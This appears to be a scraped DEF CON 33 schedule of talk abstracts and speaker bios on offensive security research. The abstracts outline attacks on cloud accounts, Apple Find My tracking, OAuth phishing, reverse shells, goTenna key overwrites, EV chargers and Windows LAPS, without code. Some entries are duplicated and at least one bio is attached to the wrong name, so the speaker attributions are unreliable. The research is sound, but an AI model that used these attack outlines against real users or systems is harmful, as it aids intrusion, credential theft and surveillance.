SpeakerBio: Furkan Aydogan, UNCWDr. Aydogan is an Assistant Professor of Computer Science at UNCW and a researcher in cybersecurity, digital forensics, and brainwave-based encryption systems. His Ph.D. focused on using EEG signals to secure IoT devices—blending neuroscience with cryptography. He’s a two-time award winner for research in VANET security and cognitive encryption.
- ics Calendar file
Cloud penetration testing has become a hot topic in the offensive community, as cloud-based infrastructures have been slowly taking the place on-prem ones used to have. This requires a tool to help with it. Nebula is a cloud pentest framework, which offers reconnaissance, enumeration, exploitation, post exploitation on AWS, Azure, DigitalOcean, and above all opportunity to extend even more. It is built modularly for each provider and each attack, allowing for diversity in attack surface. This coupled with the client-server architecture allows for a collaborated team assessment of a hybrid cloud environment.
SpeakerBio: Bleon "Gl4ssesbo1" ProkoBleon is an infosec passionate about infrastructure penetration testing and security, including Active Directory, cloud (AWS, Azure, GCP, Digital Ocean), hybrid infrastructures, as well as defense, detection, and threat hunting. He has presented topics related to cloud penetration testing and security at conferences like Black Hat USA, Europe, and Sector, DEF CON, SANS Pentest Hackfest Hollywood and Amsterdam, as well as several BSides in the USA and Europe. His research includes Nebula, a cloud penetration testing framework and other blogs, which you can also find on his blog; blog.pepperclipp.com. He is also the author of YetiHunter and DetentionDodger; github.com/permiso-io-tools. He is also the author of the upcoming book Deep Dive into Clouded Waters: An Overview in Digital Ocean's Pentest and Security; leanpub.com/deep-dive-into-clouded-waters-an-overview-in-digitaloceans-pentest-and-security.
- ics Calendar file
Traditional digital security often falls short when applied to IoT environments, where devices are limited in processing power and exposed to a wider range of threats. Human vulnerabilities—especially against deepfake-style attacks—further weaken current systems. Static biometrics like fingerprints or facial scans are no longer enough. This work proposes a new direction: using the brain’s unique electrical activity (EEG signals) as a security layer. These dynamic, hard-to-replicate patterns offer a way to authenticate users without storing sensitive data or relying on heavy computation. By grounding trust in the user’s own biological signals, this approach offers a lightweight, resilient solution tailored to the constraints of modern IoT devices.
Speakers:Mehmet Önder Key,Temel Demir,Dr. Ahmet Furkan AydoganÖnder Key is a cybersecurity consultant specializing in critical infrastructure security, zero-day vulnerability analysis, and offensive security. He has advised organizations in high-security sectors such as defense, aerospace, and finance, with hands-on experience in both red teaming and strategic security engineering. His work has been featured across numerous countries and platforms, contributing to the discovery of systemic vulnerabilities. Currently, he provides consultancy to Burkut, Ogrit, Ravenailabs and continues to advance the global offensive security ecosystem by challenging traditional approaches to cybersecurity.
SpeakerBio: Temel Demir, Cybersecurity Lead at KPMG
- ics Calendar file
- ics Calendar file
Every once in a while, we get a grim reminder that the open-source trust model that enables developers to use each other’s code and resources can be abused by attackers.
GitHub users recently suffered from such a wake-up call. In March 2025, the highly-publicized "tj-actions" incident came to light, throwing many GitHub organizations and users into panic, as their credentials were leaked via their supply chain. But while the masses were scared about the massive credential exposure, we were able to piece together evidence to show that the leakage wasn't the primary goal of this attack, and that the initial buzz was just the tip of the iceberg. Our investigations indicate that more highly-popular projects were targeted as part of this campaign, and DefCon will be the first place that we reveal the newly-discovered details.
We’ll reveal how the attack began months earlier than initially believed, with the attacker compromising multiple open-source projects utilizing them for lateral movement. We'll detail how the adversary maintained a low profile, patiently waiting to spear-target Coinbase. We will dissect the sophisticated evasion techniques employed and the attacker’s modus operandi, showing how the open-source access and trust model were weaponized to deliver a precise and calculated supply chain attack.
References:
SpeakerBio: Aviad HahamiSecurity researcher and experienced software engineer with a great passion for algorithms (graph-theory specifically), security research (vulnerability research, bug bounties), chaos engineering (YES!), frontends, backends, web services, systems architecture, infras, clouds(making them rain), and more :) Today, researching at Palo Alto Networks. Oh yea I also DJ
- ics Calendar file
Apple Find My is a crowdsourced offline tracking network designed to assist in recovering lost devices while maintaining privacy. By leveraging over a billion active Apple devices, it has become the world's largest device-locating network. While prior research has demonstrated the possibility of creating DIY trackers that attach to the Find My network, they are mainly for personal use and do not pose a threat for remote attacks. Recently, we found an implementation error in the Find My network that makes it vulnerable to brute-force and rainbow table attacks. With a cost of a few US dollars, the exploit turns computers into trackers without requiring root privileges. We are concerned that adversaries and intelligence agencies would find this exploit handy for user profiling, surveillance, and stalking. This demo is especially appealing to those interested in Find My network and Bluetooth tracking technologies. We will review how Find My offline finding works, elaborate in detail about our discoveries, techniques to make practical attacks, and provide source code for fun.
Speakers:Junming "Chapoly1305" Chen,Qiang ZengJunming is a PhD student at George Mason University. He works on IoT security and was previously a full-time security engineer in the electric automotive industry. He has a CompTIA Security+ certificate like everybody. He supports the Rizin Reverse Engineering Framework. This will be his first time presenting at DEF CON.
SpeakerBio: Qiang ZengQiang received his bachelor's and master's degrees from Beihang University and his PhD degree from Penn State University. He is an associate professor in the Department of Computer Science with George Mason University. He is the recipient of an NSF CAREER Award. His main research interest is computer systems security, with a focus on cyber-physical systems, Internet of Things, and mobile computing. He also works on adversarial machine learning.
- ics Calendar file
Nuclei has become a game-changing tool for hackers worldwide, transforming how we discover vulnerabilities and hack at scale. This workshop explores why Nuclei is dominating the bug bounty scene and how it's evolving the art of automated hacking. We'll dive into how this open-source powerhouse lets hackers scan thousands of targets, write custom templates, and find bugs that automated scanners miss.
SpeakerBio: Ben "nahamsec" Sadeghipour, Co-Founder & CEO at HackingHubBen Sadeghipour, better known as NahamSec, is an ethical hacker, content creator, and keynote speaker. Over his career, Ben has uncovered thousands of security vulnerabilities for major organizations, including Amazon, Apple, Zoom, Meta, Google, and the U.S. Department of Defense. As a top-ranked bug bounty hunter, he is deeply passionate about cybersecurity education, regularly sharing his knowledge through his popular YouTube channel and speaking at major conferences like DEFCON and BSides. Beyond his personal achievements, Ben is committed to building the security community, organizing events that foster collaboration, innovation, and the next generation of offensive security professionals.
- ics Calendar file
OAuthSeeker is a cutting-edge red team tool designed to simulate OAuth phishing attacks, specifically targeting Microsoft Azure and Office365 users. This tool facilitates the creation, management, and execution of phishing campaigns without requiring advanced technical skills. By leveraging malicious OAuth applications, OAuthSeeker allows offensive security engineers to perform targeted phishing attacks to compromise user identities and gain access to Microsoft Graph API and Azure resources. With features like an administrative control panel, token refresh capabilities, and customizable skins for user-facing components, OAuthSeeker provides an effective solution for testing security defenses against a common but often overlooked attack vector. The tool is easy to deploy with only a single pre-compiled Go binary with zero external dependencies and includes built-in support for LetsEncrypt. The documentation is highly detailed and outlines all the possible attack paths where this capability could be used during real-world red team engagements. The installation process is streamlined requiring only a single command to deploy a new instance of the application.
SpeakerBio: Adam "UNC1739" Crosser, Staff Security Engineer at PraetorianAdam Crosser is a Staff Security Engineer at Praetorian, specializing in offensive security research and tooling development. He began his career in red team operations, honing his skills in adversary simulation and advanced attack techniques. Now part of the Praetorian Labs team, Adam focuses on vulnerability research, exploit development, and building custom offensive security capabilities to support red team engagements—pushing the boundaries of adversary tradecraft.
- ics Calendar file
Accesses to the blockchain's state and logs leak highly sensitive information such as the user's identity, who it is trading with, and which crypto-asset the user is interested in trading. In this tutorial, we will go over two technologies for ensuring access pattern privacy, including Oblivious RAM (ORAM), and Private Information Retrieval (PIR). Unlike traditional encrypted databases that protect only the contents of data, our technologies additionally protect the queries, thus hiding users' intentions. We will describe two extremely simple constructions, one ORAM, and one PIR scheme. In particular, the ORAM algorithm is also the one used by industry leaders such as Signal and Meta. We will next show a demo for our oblivious key-value store implementation. We will also challenge the learners with a CTF problem that demonstrates how sensitive secrets can easily be leaked even when the memory contents are encrypted.
Speakers:Elaine Shi,Afonso TinocoElaine Shi is a Packard Fellow, Sloan Fellow, ACM Fellow, and IACR Fellow. A Professor with a joint appointment in CSD and ECE at Carnegie Mellon University, Elaine is also an Adjunct Professor of Computer Science at the University of Maryland. Her research interests include cryptography, security, mechanism design, algorithms, foundations of blockchains, and programming languages. Elain is a co-founder of Oblivious Labs, Inc. My research on Oblivious RAM and differentially private algorithms have been adopted by Signal, Meta, and Google.
SpeakerBio: Afonso TinocoAfonso Tinoco is a PhD candidate currently on leave from Carnegie Mellon University and University of Lisbon. His research interests include Applied Cryptography and Distributed System Verification. He is a Co-Founder and a Research Engineer at Oblivious Labs, Inc. (https://obliviouslabs.com). Oblivious Lab’s mission is to develop open-source toolchains for Oblivious Computation (https://github.com/obliviouslabs/), with the goal of accelerating the wide deployment of Oblivious Computations. He is also a co-captain of STT (https://sectt.github.io/) , the CTF team of University of Lisbon.
- ics Calendar file
For years, Pentestmonkey Reverse Shell Cheat Sheet defined the essentials of post-exploitation. Bash, Python, PHP, (G)Awk, Netcat and others were quick, simple and highly effective tools for gaining shell access. Today, those tools are the first to be flagged, restricted or removed. In real-world hardened environments, the old paths are closed. Meanwhile, new runtimes like Clojure, Racket, NATS-IO, Bun, Crystal, Red Language, Ballerina and others are becoming part of production environments, CI/CD pipelines and internal developer ecosystems, usually without security teams treating them as risks.
This workshop focuses on building practical, working reverse and bind shells using these modern runtimes. Participants will write their own payloads, test them live against targets and leave with working knowledge of how to survive without traditional tooling. Every shell demonstrated will be integrated into the Metasploit Framework with custom modules built for each runtime. Source code, victim and attacker virtual machines and pre-built environments will be provided to ensure every participant can practice during the session.
This is not a theory-heavy workshop. It is about operational survival when Python is gone, Netcat is restricted and standard shells are no longer viable. It is about turning runtimes that defenders ignore into reliable offensive footholds. Attendees will leave with ready-to-use payloads, working Metasploit extensions, and the technical knowledge to adapt to modern detection-heavy environments.
SpeakerBio: Roberto SoaresWith more than 10 years immersed in Information Security, he is an Information Security Engineer specializing in Red Team. His focus extends to best practices, encompassing application and infrastructure vulnerability assessments, code reviews, and a mix of static and dynamic analyzes to identify vulnerabilities. In addition to his main focus, he has a strong inclination to develop offensive tools. He has contributed more than 25 modules to the core Metasploit framework and registered several CVEs. Additionally, his knowledge covers the complex landscape of macOS security. His curiosity leads him to test non-trivial scenarios, from analyzing cranes that operate containers on ships, to delving into the complexities of embedded systems (SCADA/PLC) and executing advanced attacks on computer networks, that is, his hacker spirit runs through his veins. . He really enjoys breaking and fixing things that contain bits and bytes.
- ics Calendar file
Encrypted radios promise off-grid privacy and security, but what if their core trust anchors can be broken with one message? Our latest research shows that a single, unauthenticated RF packet can overwrite any public keys goTenna Pro stores for peer-to-peer and group chats, silently substituting attacker-controlled keys so that every AES-256 encrypted message is now readable only to the attacker, not the intended recipient; by repeating the swap on both ends the attacker becomes an undetectable man-in-the-middle who alone can forward, alter, or drop traffic, leaving victims blind to compromise. We will live-demo three outcomes: pulling teams into GPS dead zones by injecting phantom coordinates; impersonating a surveillance teammate to feed disinformation and fracture cohesion; and detonating a network-wide blackout that forces operators onto weaker radio communication that allows easy direction-finding. The audience will watch us craft the packet, poison key stores, pivot between victims, and restore normalcy - all from commodity SDR hardware and open-source code released at the session. We close with a hardening guidance and a patch in goTenna Pro version 2.0.3 (CVE-2024-47130) proving once again that cryptography is only as strong as the key lifecycle surrounding it.
Speakers:Erwin "Dollarhyde" Karincic,WoodyErwin is an experienced security researcher specializing in both hardware and software reverse engineering, binary analysis, and exploit development across a range of processor architectures. He has notable experience in implementing complex Radio Frequency (RF) waveforms using Software Defined Radios (SDRs) for cybersecurity applications, complemented by his proficiency in designing, simulating, and fabricating antennas tailored for such applications. His past work includes extensive TCP/IP networking experience, designing worldwide secure communication systems. Erwin holds a number of prestigious certifications, including OSCP, OSCE, OSWE, OSEE, and CCIE Enterprise Infrastructure. Erwin is also a staff member in the RF Hacker Sanctuary and a member of Security Tribe.
SpeakerBio: WoodyWoody thinks Linux is a member of the Charlie Brown gang who can lift heavy things but not always spell them. He has had some success with RF exploits in the past with the first ever goTenna exploit talk in the RF wireless village as well as the first attack against Ford Raptor key fobs with RaptorCaptor exploit. Woody’s unique background, familiar to some, gives him a creative aspect to the impact of goTenna Pro research in the physical and RF world. Woody is also a staff member in the RFHacker Sanctuary, a member of Security Tribe, and has appeared on a few episodes of Hak5 describing novel device attacks.
- ics Calendar file
In this talk we present a collection of attacks against the most widely used EV charging protocol, by exploiting flaws in the underlying power-line communication technologies affecting almost all EVs and chargers.
Specifically, we target the QCA 7000 Homeplug modem series, used by the two most popular EV charging systems, CCS and NACS.
We demonstrate multiple new vulnerabilities in the modems, enabling persistent denial of service.
To better understand the scope of these issues, we conduct a study of EV chargers and vehicles, and show widespread insecurities in existing deployments.
We show a variety of practical real-world scenarios where the HomePlug link can be used to hijack EV charging communications, even at a distance.
Finally, we present results from reverse engineering the firmware and how we can gain code execution.
Speakers:Marcell Szakály,Sebastian Köhler,Jan "SP3ZN45" BerensMarcell Szakály is a PhD student in the Systems Security Lab at the University of Oxford. His research focuses on the security of the EV charging infrastructure. He received his masters degree in Physics, and worked on superconducting magnet design. His work now involves RF hardware, SDRs, and digital electronics.
SpeakerBio: Sebastian KöhlerPrevious speaker at CarHackingVillage 2023, Redeploying the Same Vulnerabilities: Exploiting Wireless Side-Channels in Electric Vehicle Charging Protocols
SpeakerBio: Jan "SP3ZN45" BerensJan Berens aka SP3ZN45 has been a goon in the QM department for several years now and is working full time as a redteamer at alpitronic SLR the leading manufacturer for DC chargers in Europe. His background is security consulting and penetration testing for critical infrastructures and industrial installations in Europe. Doing mostly non publicly disclosed security research and mentoring of beginners in the security domain.
- ics Calendar file
In this talk we present a collection of attacks against the most widely used EV charging protocol, by exploiting flaws in the underlying power-line communication technologies affecting almost all EVs and chargers.
Specifically, we target the QCA 7000 Homeplug modem series, used by the two most popular EV charging systems, CCS and NACS.
We demonstrate multiple new vulnerabilities in the modems, enabling persistent denial of service.
To better understand the scope of these issues, we conduct a study of EV chargers and vehicles, and show widespread insecurities in existing deployments.
We show a variety of practical real-world scenarios where the HomePlug link can be used to hijack EV charging communications, even at a distance.
Finally, we present results from reverse engineering the firmware and how we can gain code execution.
References:
Marcell Szakály is a PhD student in the Systems Security Lab at the University of Oxford. His research focuses on the security of the EV charging infrastructure. He received his masters degree in Physics, and worked on superconducting magnet design. His work now involves RF hardware, SDRs, and digital electronics.
SpeakerBio: Jan "SP3ZN45" BerensJan Berens aka SP3ZN45 has been a goon in the QM department for several years now and is working full time as a redteamer at alpitronic SLR the leading manufacturer for DC chargers in Europe. His background is security consulting and penetration testing for critical infrastructures and industrial installations in Europe. Doing mostly non publicly disclosed security research and mentoring of beginners in the security domain.
SpeakerBio: Sebastian KöhlerPrevious speaker at CarHackingVillage 2023, Redeploying the Same Vulnerabilities: Exploiting Wireless Side-Channels in Electric Vehicle Charging Protocols
- ics Calendar file
A cross-border health emergency is spreading fast and you’re on the front lines of the response. Hospitals are overwhelmed. ICU beds are full. Strange symptoms are emerging in a tight geographic cluster across southern Germany and eastern France. Supply chains are buckling, communications are failing, and trust in public health institutions is unraveling. At the Biohacking Village during DEF CON 33, Operation Europa Crisis invites you to join a gripping, real-time tabletop challenge. 🧠 Step Into the Crisis Take on roles such as: Hospital administrators Health ministry officials Crisis communication leads Frontline clinical staff Supply chain and logistics coordinators CBRN and incident response team Together, you'll investigate the cause, coordinate international response efforts, manage conflicting narratives, and navigate critical decisions in a high-pressure environment.
SpeakerBio: Nathan Case, CSO at ClarityNathan Case is a cybersecurity engineer and executive with over two decades of experience designing, securing, and scaling complex systems across public and private sectors. He currently serves as the Vice President of Cloud Computing and Cyber Solutions at Clarity, leading efforts at the intersection of secure cloud architecture, AI engineering, and national defense. In this role, he provides technical direction, manages multidisciplinary teams, and collaborates closely with government stakeholders to deliver operationally effective solutions that meet mission-critical needs.
- ics Calendar file
We’re trying to debug the end of the world through trial and error — mostly error. In the middle of a worsening climate crisis, outdated OT protocols like Modbus are being exploited by state-sponsored actors in ways that turn environmental infrastructure into geopolitical weapons. From hijacked dams running Windows 95-era code to smart thermostats recruited into botnets fighting over Arctic oil, the climate-tech battlefield is already here.
This session dives into how APTs are quietly compromising the systems designed to save the planet. We’ll examine real-world campaigns where threat actors have targeted energy grids, carbon capture labs, and EV infrastructure — and how climate action is being derailed by 1970s-era code and modern apathy.
This is Cyber Threat Intelligence meets Climate Fiction (Cli-Fi). It’s weird, terrifying, and very real.
SpeakerBio: Cybelle Oliveira, Cyber Threat Intelligence Researcher at MalwarelandiaCybelle Oliveira is a Cyber Threat Intelligence researcher and a Master’s student in Cyber Intelligence. She teaches in a postgraduate CTI specialization program in Brazil and is the co-founder of La Villa Hacker — the first DEF CON village dedicated to the Portuguese and Spanish-speaking community. Cybelle has spoken at some of the world’s leading security conferences, including DEF CON, BSides Las Vegas/São Paulo/Rio de Janeiro, 8.8 Chile, Cryptorave, Radical Networks, Mozilla Festival, and many others. Her work often explores the intersection of cyber threats, geopolitics, and underreported regions, with a particular interest in the strange, obscure, and catastrophically messy corners of cybersecurity.
- ics Calendar file
While the theft of Primary Refresh Token (PRT) cookies on Windows has been extensively studied, similar attacks on macOS remain unexplored. As organizations increasingly use Microsoft Intune to manage both Windows and macOS devices, a critical question arises: can attackers also extract PRT cookies from macOS?
In this talk, we present our research into Microsoft’s SSO implementation within the Intune Company Portal for macOS. We compare authentication flows and security controls between Windows and macOS, exposing weaknesses that allow attackers to bypass process validation and obtain authentication tokens under certain conditions.
Another obstacle for attackers has been Microsoft’s efforts to make it more difficult to register new devices using stolen credentials for persistence. Our research introduces a novel technique: once an attacker acquires a token with an MFA claim on the device, they can still register new devices and generate new tokens without concern for the original stolen token’s expiration.
We will demonstrate PRT Cookie extraction on macOS and release a proof-of-concept tool, showing not only how credential theft techniques can now extend beyond Windows to macOS environments, but also how attackers can leverage these techniques for long-term persistence.
References:
Shang-De Jiang is a deputy director of the research team of CyCraft. Currently, he focuses on research on Incident Response and Endpoint Security and Microsoft Security. He has presented technical presentations in non-academic technical conferences, such as TROOPERS, HITB, HITCON, CodeBlue, Blue Team Summit and BlackHat USA. He is the co-founder of UCCU Hacker the private hacker group in Taiwan.
SpeakerBio: Dong-Yi "Kazma Ye" YeKazma is a university student from Taiwan and cybersecurity intern of CyCraft. His current work focuses on how Microsoft Entra ID integrates and behaves on macOS, diving deep into binary internals and real-world authentication logic. He’s also a CTF player with the B33F 50UP team, with a passion for reverse engineering and binary exploitation.
SpeakerBio: Tung-Lin "Echo Lee" LeeEcho is a cybersecurity researcher at CyCraft Technology, specializing in network and cloud security. He has presented at industry conferences, including DEVCORECONF, HITCON ENT, ROOTCON, InfoSec Taiwan, and CyberSec.
- ics Calendar file
This presentation will provide ICS security practitioners with a comprehensive introduction to Operational Technology (OT) network segmentation. As industrial control systems face increasing cyber threats, proper network segmentation has become a critical security control to limit attack surfaces and protect critical infrastructure.
Attendees will learn practical approaches to planning segmentation architectures, implementing controls across OT environments, and validating the effectiveness of their segmentation strategy.
The session blends theoretical concepts with practical implementation guidance suitable for security practitioners with introductory to intermediate knowledge of industrial control systems.
Key topics include: OT Network Segmentation Fundamentals (objectives, benefits, IT/OT differences, reference architectures); Planning Strategies (asset inventory, flow analysis, zone design, risk-based requirements, legacy systems); Implementation Approaches (physical vs. logical separation, DMZs, deep packet inspection, data diodes, appropriate tools); Validation Methods (verification techniques, safe penetration testing, monitoring, measuring success); and Real-World Case Studies with lessons learned and common challenges.
This session is designed for industrial cybersecurity professionals, control system engineers, IT/OT security architects, and other stakeholders responsible for securing operational technology environments. Attendees should have basic familiarity with industrial control systems and networking concepts.
SpeakerBio: Tony Turner, FrenosTony is a seasoned security architect with over 25 years of experience spanning both IT and OT cybersecurity domains. As VP of Product at Frenos, he leads an AI-driven platform that automates security assessments for operational technology environments.
His diverse background includes critical infrastructure protection at a major US airport, incident command for state government public health systems, engineering disaster recovery operations for hurricane response, and security implementations for global semiconductor and integrated circuit manufacturing facilities.
Tony has developed specialized expertise in vulnerability management, security hardening, application security, secure network infrastructure, supply chain risk management, and Cyber Informed Engineering (CIE). He authored "Software Transparency" and developed the SANS SEC547 course "Defending Product Supply Chains."
As OWASP Orlando chapter lead and Chief Editor for cyberinformedengineering.com, Tony actively promotes security best practices within the industrial community. He also leads defendics.org, a nonprofit focused on advancing Cybersecurity Performance Goals (CPG) and foundational OT security practices for resource-constrained asset owners.
- ics Calendar file
Local Administrator Password Solution (LAPS) automates local admin password rotation and secure storage in Active Directory (AD) or Microsoft Entra ID. It ensures that each system has a unique and strong password.
In OverLAPS: Overriding LAPS Logic, we will revisit and extend our previous research (Malicious use of "Local Administrator Password Solution", Hack.lu 2017) by exposing client-side attacks in Windows LAPS ("LAPSv2"). After a brief overview of LAPS's evolution, from clear-text fields in AD with Microsoft LAPS ("LAPSv1") to encrypted AD attributes or Entra ID storage with Windows LAPS, we will explore the client-side logic of Windows LAPS. Unlike prior work that exfiltrates passwords only after directory compromise, we will focus on abusing LAPS to maintain presence on compromised endpoints, both on-prem and Entra-joined devices.
We will leverage PDB symbols and light static analysis to understand how LAPS works internally, then use Frida for dynamic hooking to capture, manipulate, and rotate admin passwords on demand. We will also reproduce Frida proof-of-concepts using Microsoft Detours for in-process hooks.
Attendees will gain practical insights into new attack vectors against Windows LAPS, enabling them to assess, reproduce, and defend against client-side attacks in their own environments.
References:
Antoine Goichot is a French cybersecurity professional and Ethical Hacker working in Luxembourg. With ten years of hands-on experience and some certifications (CRTO/CRTL, GPEN/GXPN, GDAT), he has been into hacking since junior high school. He was always trying to find clever ways to solve technical problems and tweak his computer. In high school, he jailbroke a dozen PSPs so friends could play homebrew games between classes. He later studied computer science and networks at TELECOM Nancy. Now as Senior Manager at PwC Luxembourg, Antoine leads projects for a large variety of clients including major corporations, banks, European institutions, and insurance companies. Beyond his day job, he has uncovered several vulnerabilities in Windows VPN clients, Cisco AnyConnect (CVE-2020-3433/3434/3435, CVE-2020-27123, CVE-2021-1427) and Ivanti Secure Access (CVE-2023-38042). These issues have been fixed by vendors after coordinated disclosure. Antoine has contributed to the cybersecurity community through a conference paper co-authored during his studies, blog posts, articles in the MISC magazine (French periodical), etc. He also co-presented at Hack.lu in October 2017 on "Malicious use of 'Local Administrator Password Solution'"
- ics Calendar file
This project is an open source hardware powered air-purifying respirator designed for use as personal protective equipment, offering N100-level filtration against airborne threats including pathogens and particulates, developed by Tetra Bio Distributed. We will demo the PAPR and discuss how to hack together your own using 3D-printed and off-the-shelf components, source one yourself, or contribute to the project.
Speakers:Sean Marquez,Melanie "Goldfishlaser" AllenSean has a B.S. degree in mechanical engineering, specializing in design of mechanical systems, from the University of Irvine, California. He is currently studying permaculture design. He worked as an associate mechanical design engineer for Max Q Systems, formerly an original equipment manufacturer for the aerospace industry. He served as the GreenHab officer at the Mars Desert Research Station. He is also a contributor for the Open Source Hardware Association open standards working group, Tetra Bio Distributed developing open-source hardware medical and PPE devices, and the Mach 30 Foundation developing the distributed open-source hardware framework.
SpeakerBio: Melanie "Goldfishlaser" AllenMelanie is a technical writer and open hardware developer. At DEF CON 32, she presented the Open Hardware Design for BusKill Cord demo lab, inviting participation in the 3D-printed dead man's switch project. She continues to contribute to open hardware and software initiatives that promote digital security and public accessibility. Learn more at mnallen.net.
- ics Calendar file
When vulnerabilities are disclosed, security teams face the task of developing exploits to identify compromised assets. Public exploits aren’t always available, which is why teams scroll through hundreds of patches to identify the relevant one. Traditional methods like grepping might fasten the process, but mostly come out ineffective against modern codebases where context-aware analysis is required. We present PatchLeaks tool that transforms the messy patch analysis process into efficient vulnerability discovery. Unlike regex-based static analysis tools, it locates relevant patches with vulnerable code based on CVE id only, doesn’t require any rules, has ability to identify logical vulnerabilities, and analyzes even corrupt files.
SpeakerBio: Huseyn "Khatai" GadashovHuseyn is a web application security specialist whose experience includes security roles at multiple financial institutions where he conducted web penetration testing, vulnerability assessments, and developed exploit automation tools. In his free time, he analyzes security patches to craft private exploits and uses them in his technical publications. Using his offensive security experience, he explores how machine learning can revolutionize the identification of hidden vulnerabilities within security patches.
- ics Calendar file
This workshop will teach how to start pen testing a cloud REST API. Attendees should have a fundamental knowledge of OWASP Top 10 and web application security. Attendees will learn how to setup tools (i.e. Burp) and practice on a simulated cloud environment to discover vulnerabilities in cloud REST APIs. This includes attacks in authorization, XSS, and SQL injection. Technologies such as OpenStack, Salesforce, and Google Cloud will be covered.
SpeakerBio: Rodney Beede, Principal Consultant at CoalfireRodney is a principal consultant and has specialized in cloud security for over 10 years. He has spoken at multiple conferences on topics from cloud security engineering to IoT device hacking. He has multiple CVEs for discovered web application security vulnerabilities. He started his career in enterprise web application software development but shifted to the security industry with this master's thesis research project "A Framework for Benevolent Computer Worms" 2012. Website: https://www.rodneybeede.com
- ics Calendar file
In this talk you get an insight into real-world Red Team operations conducted onboard ships and against maritime companies. Drawing from first-hand experience, the presentation walks through how Red Teamers boarded cruise ships undercover as regular passengers and proceeded to gain deep access to both IT systems and critical operational areas. The talk reveals how testers were able to physically enter restricted zones such as communication rooms and engine control rooms, all while blending in with guests and crew. It will also showcase how vulnerabilities in shipboard infrastructure allowed the team to manipulate or disable key systems, including navigation and onboard communications, on both passenger and cargo vessels. Whether you’re in cybersecurity, maritime operations, or just curious about how to hack a ship, this is a talk you don’t want to miss.
SpeakerBio: John Andre Bjørkhaug, NetsecurityJohn-André Bjørkhaug has worked as a penetration tester for over 16 years. He has a degree in electrical engineering but prefer to break things instead of building things. This led him to become a hacker/penetration tester. John's main focus is penetration testing of internal infrastructure and physical security system together with social engineering and full scale Red Team tests.
- ics Calendar file
Hey there hackers! I am a Lead Triager at HackerOne based in Denver. I started my security journey by sending out download links to trojans to unsuspecting users on ICQ. Years later I began poking around internal systems at the companies I worked at. This led to a deeper interest in how easily users can be compromised. Shortly after I went all in on learning all things appsec related. Today I get to see, recreate, assess, and triage your bug bounty reports which range from open redirects to PII disclosure of thousands of customers to novel LLM hacks. I've triaged over 10,000 reports. My advice is to validate your input! Feel free to reach out over LinkedIn.
SpeakerBio: Michael "codingo_" Skelton, BugcrowdInti De Ceukelaire is a Belgian ethical hacker and cybercrime investigator. He currently works as the Chief Hacker Officer at Europe's largest vulnerability disclosure platform Intigriti, a founding member of the Hacker Policy Council. In 2018, Inti won the "Most Valuable Hacker" award at the largest live hacking event in Las Vegas.
With extensive experience in the field of security and ethical hacking, Inti has earned a reputation as a thought leader in the industry. His work and expertise have been featured in a variety of international publications, including the BBC, Wired, The Verge, CNET, Mashable, and New York Magazine. Inti has made global headlines through his security awareness pranks, which have included manipulating the Vatican's website, creating fake news on Donald Trump's Twitter account, and hacking Metallica. Through these high-profile stunts, Inti has drawn attention to the importance of cybersecurity and the need for individuals and organisations to be vigilant about potential threats. As an experienced and engaging speaker, Inti is able to make complex topics accessible to a wide audience. He has spoken at a variety of conferences and events, sharing insights on the latest trends in cybersecurity and offering practical tips to help individuals and organisations protect themselves from potential threats.
He is also a trusted source for media outlets seeking expert commentary on topics related to cybersecurity, hacking and technology.
SpeakerBio: Eddie Rios, SynackBorn and raised in TX, been hacking or breaking things since I was Kid. Got my start in Phreaking because computers were too expensive back then! Been working in the Information Security field since 2013 and have been working for Synack since 2016. I've seen over 15k reports in that time and have been pretty active with researchers from all over the world. Before security I worked as a technician for various companies including Geek Squad. Before my time on in IT I did body piercings or worked in various fields included retail and fast food. All of which helped me understand the importance of helping people to the best of my abilities.
SpeakerBio: Anthony Silva, Customer Success Manager at YesWeHackAnthony Silva is a Customer Success Manager at YesWeHack, where he manages a diverse portfolio of clients -- from startups to international enterprises -- across multiple industries and countries.
He supports organizations in designing, launching, and optimizing their bug bounty, vulnerability disclosure (VDP), and pentest programs, guiding them from initial onboarding through the full lifecycle of their engagements.
Anthony works closely with cross-functional teams, including sales, product, technical experts, triage analysts, and the hacker community, to ensure customer satisfaction and program effectiveness.
Before joining YesWeHack, he gained valuable experience in various technology and consulting companies, where he developed a strong foundation in cybersecurity, project management, and client relations. As an active registered hunter on several platforms, he also brings hands-on insight into offensive security practices.
Based in Paris and originally from Toulouse, Anthony has French, Spanish, and Portuguese roots. He is passionate about technology, geopolitics, science, and video games.
SpeakerBio: Jasmin "JR0ch17" LandryJasmin Landry is a seasoned ethical hacker and full-time bug bounty hunter who has reported hundreds of security vulnerabilities to some of the world’s largest tech companies. After years leading cybersecurity efforts as Senior Director of Information Security at Nasdaq, Jasmin returned to his roots in hacking — now focusing exclusively on uncovering critical bugs through bug bounty platforms. Recognized at multiple live hacking events for top findings, he brings a sharp eye for unexpected issues and a deep understanding of modern attack surfaces. He’s also a co-leader of OWASP Montréal and an active voice in the security research community.
- ics Calendar file
Quantum computers will crack RSA and ECC and weaken symmetric encryption, but when? NIST is betting it won't happen before 2035, setting that deadline for companies to migrate to post-quantum cryptography (PQC). However, recent developments make it clear that we might not have 10 years; we might have only 5! Join Konstantinos Karagiannis (KonstantHacker) as he breaks down the latest algorithmic estimates, including Oded Regev's game-changing tweak to Shor's algorithm, which promises faster factoring with fewer qubits. He also discusses IonQ and IBM's aggressive roadmaps, pushing us closer to cryptographically relevant quantum computers (CRQCs). Think 1000+ qubits by 2026 and fault-tolerant systems by 2030. And when Q-Day does arrive, will we be able to catch or prevent bad actors from running these algorithms on cloud quantum platforms? Learn what's possible when monitoring quantum circuit patterns and suspicious API calls.
SpeakerBio: Konstantinos Karagiannis, Director of Quantum Computing Services at ProtivitiForged in the InfoSec trenches of the 90s and a pioneer in the quantum computing space since 2012, Konstantinos Karagiannis (KonstantHacker) lives at the intersection of cryptography and physics. As Protiviti's Director of Quantum Computing Services, he translates the existential threat—and promise—of quantum for the world's top organizations. When he's not behind the mic on The Post-Quantum World podcast, you can find him on stage at RSA, Black Hat, and right here at DEF CON, where he reigns as a Venerable Village Elder of the Quantum Village.
- ics Calendar file
